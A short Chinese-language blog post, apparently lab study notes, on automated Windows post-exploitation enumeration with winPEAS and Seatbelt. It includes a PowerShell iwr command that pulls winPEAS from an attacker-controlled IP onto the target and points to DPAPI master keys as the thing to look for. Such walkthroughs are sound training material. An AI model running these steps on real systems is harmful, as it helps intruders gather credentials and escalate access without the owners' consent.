Windows 自動化列舉

Windows 自動化列舉 


winPEAS 是一個自動化列舉的工具,方便我們在有限的時間內進行自動化列舉

先安裝 PEASS,參考此網址 https://www.kali.org/tools/peass-ng/ 

透過指令 linpeas -h & peass -h 進行安裝




然後到目標的 Windows 機器上啟動 PowerShell 透過 iwr 指令去下載該執行檔,指令如下

iwr -uri http://192.168.45.228/winPEASx64.exe -Outfile winPEAS.exe

接著直接執行 .\winPEAS.exe > winPEAS.txt 輸出到檔案方便查看

目標要查找標題為 Checking for DPAPI Credential Files 的輸出當中的主密鑰,如下




可以上傳另一個自動化列舉工具 Seatbelt,可以在這裡下載

https://github.com/r3motecontrol/Ghostpack-CompiledBinaries/blob/master/Seatbelt.exe

下載後上傳到目標主機,於 PowerShell 底下執行指令 .\Seatbelt.exe -group=all

查找名為 InstalledProducts 的部分並找到 XAMPP 的條目。DisplayVersion 的值如下




留言

這個網誌中的熱門文章

Challenge 0 - Secura(2)

Challenge 0 - Secura(1)

Challenge 8 - Poseidon(0)